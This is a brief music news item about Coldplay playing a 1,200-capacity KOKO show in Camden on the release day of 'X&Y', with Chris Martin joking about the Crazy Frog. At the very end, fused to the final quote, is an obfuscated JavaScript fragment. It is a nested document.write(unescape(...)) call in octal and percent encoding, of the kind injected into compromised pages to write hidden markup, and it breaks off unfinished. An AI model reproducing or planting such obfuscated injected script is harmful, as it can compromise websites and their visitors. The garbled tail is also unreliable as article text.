Coldplay have confirmed they will be marking the release of their new album 'X&Y' with a tiny London club show at Camden's KOKO. And while it hasn't sold out yet, you'd better look sharp...
Coldplay will play the club tonight on the day their new album is released, Monday June 6. Tickets for the show at the tiny 1,200 capacity KOKO in London's Camden district will cost £20 and go on sale 8am from the venue itself on the day of the show. There will be no telephone or online sales for this gig, tickets are limited to one per person and all proceeds from the show will go to The Royal Marsden Cancer Campaign.
Speaking recently to Xfm, Chris Martin spoke about his recent chart battle with the Crazy Frog's ‘Axel F'.
'We refer to him as ‘That Little Frog',' Martin begins. 'We don't like the frog and it brings me out in hives. I go red. The point is that little thing should have its legs chopped off and I'd like to eat them in a restaurant.'
'I don't know what I'm talking about,' he continued. 'We love the frog. He's friendly nice. We saw him backstage at Top Of The Pops. He was doing all kinds of drugs. He was with all kinds of pond life hanging around him.'document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
